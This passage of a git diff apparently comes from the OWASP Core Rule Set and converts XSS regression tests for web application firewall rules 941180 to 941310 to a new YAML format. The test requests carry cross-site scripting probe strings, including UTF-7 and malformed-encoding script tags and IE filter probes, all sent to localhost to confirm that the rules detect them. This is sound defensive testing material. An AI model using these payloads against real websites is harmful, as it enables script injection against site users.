"HTTP/1.1" + output: + log: + expect_ids: [941180] + - test_id: 7 desc: "We should not trigger on REQUEST_FILENAME without special characters" stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: "/get/javascript-manual/document.cookie" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - no_log_contains: id "941180" + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: "/get/javascript-manual/document.cookie" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log: + no_expect_ids: [941180] diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941181.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941181.yaml index a6f3217f3..ff7471614 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941181.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941181.yaml @@ -1,75 +1,73 @@ --- meta: author: "Paul Beckett, azurit" - enabled: true - name: "941181.yaml" - description: "Tests to trigger, or not trigger 941180" +rule_id: 941181 tests: - - test_title: 941181-1 + - test_id: 1 desc: Node-validator deny list keywords, ARGS stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - uri: "/post/foo" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: '941181-1=-->' - version: "HTTP/1.1" - output: - log_contains: id "941181" - - test_title: 941181-2 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + uri: "/post/foo" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: '941181-1=-->' + version: "HTTP/1.1" + output: + log: + expect_ids: [941181] + - test_id: 2 desc: Node-validator deny list keywords, ARGS stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - uri: "/post/foo" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: '941181-1=--%3E' - version: "HTTP/1.1" - output: - log_contains: id "941181" - - test_title: 941181-3 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + uri: "/post/foo" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: '941181-1=--%3E' + version: "HTTP/1.1" + output: + log: + expect_ids: [941181] + - test_id: 3 desc: Node-validator deny list keywords, ARGS_NAMES stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - uri: "/post/bar" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: '-->=941181-3' - version: "HTTP/1.1" - output: - log_contains: id "941181" - - test_title: 941181-4 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + uri: "/post/bar" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: '-->=941181-3' + version: "HTTP/1.1" + output: + log: + expect_ids: [941181] + - test_id: 4 desc: Node-validator deny list keywords, ARGS_NAMES stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: "/get/baz" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Cookie: '-->=941181-4' - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: id "941181" + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: "/get/baz" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Cookie: '-->=941181-4' + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log: + expect_ids: [941181] diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941190.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941190.yaml index 6b0f1e2fe..d41e2d48b 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941190.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941190.yaml @@ -1,92 +1,90 @@ --- meta: author: "csanders-git, azurit" - enabled: true - name: "941190.yaml" - description: "Tests to trigger, or not trigger 941190" +rule_id: 941190 tests: - - test_title: 941190-1 + - test_id: 1 desc: Node-validator deny list keywords, ARGS stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - uri: "/post" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: "941190-1=" - version: "HTTP/1.1" - output: - log_contains: id "941190" - - test_title: 941190-2 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + uri: "/post" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: "941190-1=" + version: "HTTP/1.1" + output: + log: + expect_ids: [941190] + - test_id: 2 desc: Node-validator deny list keywords, ARGS_NAMES stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - uri: "/post" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: "x=" - version: "HTTP/1.1" - output: - log_contains: id "941190" - - test_title: 941190-3 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + uri: "/post" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: "x=" + version: "HTTP/1.1" + output: + log: + expect_ids: [941190] + - test_id: 3 desc: Node-validator deny list keywords, COOKIES_NAMES stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: "/get/baz" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Cookie: '' - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: id "941190" - - test_title: 941190-4 + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: "/get/baz" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Cookie: '' + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log: + expect_ids: [941190] + - test_id: 4 desc: Test first replaced backslash match (\x5c) stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: "/get" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Cookie: 'My-Cookie=&var2=whatever" - version: HTTP/1.0 - output: - log_contains: id "941230" - - test_title: 941230-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=&var2=whatever" + version: HTTP/1.0 + output: + log: + expect_ids: [941230] + - test_id: 2 desc: "XSS test based on portswigger XSS cheatsheet" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "payload=" - version: HTTP/1.0 - output: - log_contains: id "941230" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "payload=" + version: HTTP/1.0 + output: + log: + expect_ids: [941230] diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941240.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941240.yaml index b77c0de58..6bd84e2c9 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941240.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941240.yaml @@ -1,39 +1,37 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None - enabled: true - name: 941240.yaml +rule_id: 941240 tests: - - test_title: 941240-1 + - test_id: 1 desc: "IE XSS Filters" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?var=%3c%3fimport%20implementation%20%3d" - version: HTTP/1.0 - output: - log_contains: id "941240" - - test_title: 941240-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?var=%3c%3fimport%20implementation%20%3d" + version: HTTP/1.0 + output: + log: + expect_ids: [941240] + - test_id: 2 desc: "Status Page Test - IE XSS Filter " - version: HTTP/1.0 - output: - log_contains: id "941250" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "payload=" + version: HTTP/1.0 + output: + log: + expect_ids: [941250] diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941260.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941260.yaml index d7e14f52c..1cc0cb1dd 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941260.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941260.yaml @@ -1,41 +1,39 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None - enabled: true - name: 941260.yaml +rule_id: 941260 tests: - - test_title: 941260-1 + - test_id: 1 desc: "IE XSS Filters" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=&var2=whatever" - version: HTTP/1.0 - output: - log_contains: id "941260" - - test_title: 941260-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=&var2=whatever" + version: HTTP/1.0 + output: + log: + expect_ids: [941260] + - test_id: 2 desc: "XSS test based on portswigger XSS cheatsheet" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "payload= +ADw-script+AD4-alert(1)+ADw-/script+AD4-" - version: HTTP/1.0 - output: - log_contains: id "941260" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "payload= +ADw-script+AD4-alert(1)+ADw-/script+AD4-" + version: HTTP/1.0 + output: + log: + expect_ids: [941260] diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941270.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941270.yaml index 26a2d797b..dec041596 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941270.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941270.yaml @@ -1,40 +1,38 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None - enabled: true - name: 941270.yaml +rule_id: 941270 tests: - - test_title: 941270-1 + - test_id: 1 desc: "IE XSS Filters" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?var=%3clink%20%2f%20asdf%20href%20%20%2f%3d%20" - version: HTTP/1.0 - output: - log_contains: id "941270" - - test_title: 941270-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?var=%3clink%20%2f%20asdf%20href%20%20%2f%3d%20" + version: HTTP/1.0 + output: + log: + expect_ids: [941270] + - test_id: 2 desc: "XSS test based on portswigger XSS cheatsheet" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: 'payload=' - output: - log_contains: id "941270" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + data: 'payload=' + output: + log: + expect_ids: [941270] diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941280.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941280.yaml index e34641c10..8d2fa94a2 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941280.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941280.yaml @@ -1,43 +1,41 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None - enabled: true - name: 941280.yaml +rule_id: 941280 tests: - - test_title: 941280-1 + - test_id: 1 desc: "IE XSS Filters" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?var=%3cBASE%20dsfds%20HREF%20%2f%20%3d" - version: HTTP/1.0 - output: - log_contains: id "941280" - - test_title: 941280-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?var=%3cBASE%20dsfds%20HREF%20%2f%20%3d" + version: HTTP/1.0 + output: + log: + expect_ids: [941280] + - test_id: 2 desc: "XSS test based on portswigger XSS cheatsheet" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Content-Length: 113 - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: 'payload=xssxss&var=whatever" - version: HTTP/1.0 - output: - log_contains: id "941290" - - test_title: 941290-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=&var=whatever" + version: HTTP/1.0 + output: + log: + expect_ids: [941290] + - test_id: 2 desc: "XSS test based on portswigger XSS cheatsheet" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "payload=" - version: HTTP/1.0 - output: - log_contains: id "941290" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "payload=" + version: HTTP/1.0 + output: + log: + expect_ids: [941290] diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941300.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941300.yaml index 43909b15a..14f42f240 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941300.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941300.yaml @@ -1,40 +1,38 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None - enabled: true - name: 941300.yaml +rule_id: 941300 tests: - - test_title: 941300-1 + - test_id: 1 desc: "IE XSS Filters" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?%3cOBJECT%20data%20%3d=sdffdsa" - version: HTTP/1.0 - output: - log_contains: id "941300" - - test_title: 941300-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?%3cOBJECT%20data%20%3d=sdffdsa" + version: HTTP/1.0 + output: + log: + expect_ids: [941300] + - test_id: 2 desc: "IE XSS Filters" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: "payload=" - output: - log_contains: id "941300" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + data: "payload=" + output: + log: + expect_ids: [941300] diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941310.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941310.yaml index 453fac17d..14f8c8907 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941310.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941310.yaml @@ -2,226 +2,225 @@ meta: author: "Christian S.J. Peron, Federico G. Schwindt, azurit" description: US-ASCII Malformed Encoding XSS Filter - enabled: true - name: 941310.yaml +rule_id: 941310 tests: - - test_title: 941310-1 + - test_id: 1 desc: Positive test using single byte stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: var=\xbcscript\xbealert(\xa2XSS\xa2)\xbc/script\xbe - version: "HTTP/1.1" - output: - log_contains: id "941310" - - test_title: 941310-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: var=\xbcscript\xbealert(\xa2XSS\xa2)\xbc/script\xbe + version: "HTTP/1.1" + output: + log: + expect_ids: [941310] + - test_id: 2 desc: Positive test using utf-8 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: var=\xc2\xbcscript\xc2\xbealert(\xc2\xa2XSS\xc2\xa2)\xc2\xbc/script\xc2\xbe - version: "HTTP/1.1" - output: - log_contains: id "941310" - - test_title: 941310-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: var=\xc2\xbcscript\xc2\xbealert(\xc2\xa2XSS\xc2\xa2)\xc2\xbc/script\xc2\xbe + version: "HTTP/1.1" + output: + log: + expect_ids: [941310] + - test_id: 3 desc: Positive test using alternate utf-8 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: var=\xd0\xbcscript\xd0\xbealert(\xc2\xa2XSS\xc2\xa2)\xd0\xbc/script\xd0\xbe - version: "HTTP/1.1" - output: - log_contains: id "941310" - - test_title: 941310-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: var=\xd0\xbcscript\xd0\xbealert(\xc2\xa2XSS\xc2\xa2)\xd0\xbc/script\xd0\xbe + version: "HTTP/1.1" + output: + log: + expect_ids: [941310] + - test_id: 4 desc: Real world false positive for old rule with Russian utf-8 characters stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # Reported in https://github.com/coreruleset/coreruleset/issues/1942 as "абвгдеёжзийклмнопрстуфхцчшщъыэюя" - data: var=\xd0\xb0\xd0\xb1\xd0\xb2\xd0\xb3\xd0\xb4\xd0\xb5\xd1\x91\xd0\xb6\xd0\xb7\xd0\xb8\xd0\xb9\xd0\xba\xd0\xbb\xd0\xbc\xd0\xbd\xd0\xbe\xd0\xbf\xd1\x80\xd1\x81\xd1\x82\xd1\x83\xd1\x84\xd1\x85\xd1\x86\xd1\x87\xd1\x88\xd1\x89\xd1\x8a\xd1\x8b\xd1\x8d\xd1\x8e\xd1\x8f - version: "HTTP/1.1" - output: - no_log_contains: id "941310" - - test_title: 941310-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # Reported in https://github.com/coreruleset/coreruleset/issues/1942 as "абвгдеёжзийклмнопрстуфхцчшщъыэюя" + data: var=\xd0\xb0\xd0\xb1\xd0\xb2\xd0\xb3\xd0\xb4\xd0\xb5\xd1\x91\xd0\xb6\xd0\xb7\xd0\xb8\xd0\xb9\xd0\xba\xd0\xbb\xd0\xbc\xd0\xbd\xd0\xbe\xd0\xbf\xd1\x80\xd1\x81\xd1\x82\xd1\x83\xd1\x84\xd1\x85\xd1\x86\xd1\x87\xd1\x88\xd1\x89\xd1\x8a\xd1\x8b\xd1\x8d\xd1\x8e\xd1\x8f + version: "HTTP/1.1" + output: + log: + no_expect_ids: [941310] + - test_id: 5 desc: Real world false positive for old rule with German utf-8 characters stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # Reported in https://github.com/coreruleset/coreruleset/issues/1645 as "de_matten & sitzbez\xc3\xbcge > fu\xc3\x9fmatten_mt" - data: var=de_matten & sitzbez\xc3\x83\xc2\xbcge > fu\xc3\x83\xc2\x9fmatten_mt - version: "HTTP/1.1" - output: - no_log_contains: id "941310" - - test_title: 941310-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # Reported in https://github.com/coreruleset/coreruleset/issues/1645 as "de_matten & sitzbez\xc3\xbcge > fu\xc3\x9fmatten_mt" + data: var=de_matten & sitzbez\xc3\x83\xc2\xbcge > fu\xc3\x83\xc2\x9fmatten_mt + version: "HTTP/1.1" + output: + log: + no_expect_ids: [941310] + - test_id: 6 desc: Negative test for opening tag stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: var=\xbc\xbc - version: "HTTP/1.1" - output: - no_log_contains: id "941310" - - test_title: 941310-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: var=\xbc\xbc + version: "HTTP/1.1" + output: + log: + no_expect_ids: [941310] + - test_id: 7 desc: Negative test for closing tag stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: var=\xbe\xbe - version: "HTTP/1.1" - output: - no_log_contains: id "941310" - - test_title: 941310-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: var=\xbe\xbe + version: "HTTP/1.1" + output: + log: + no_expect_ids: [941310] + - test_id: 8 desc: Negative for missing end tag, opening tag stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: var=\xd0\xbcscript\xd0\xbealert(\xc2\xa2XSS\xc2\xa2)\xd0\xbc/script\xd0 - version: "HTTP/1.1" - output: - no_log_contains: id "941310" - - test_title: 941310-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + 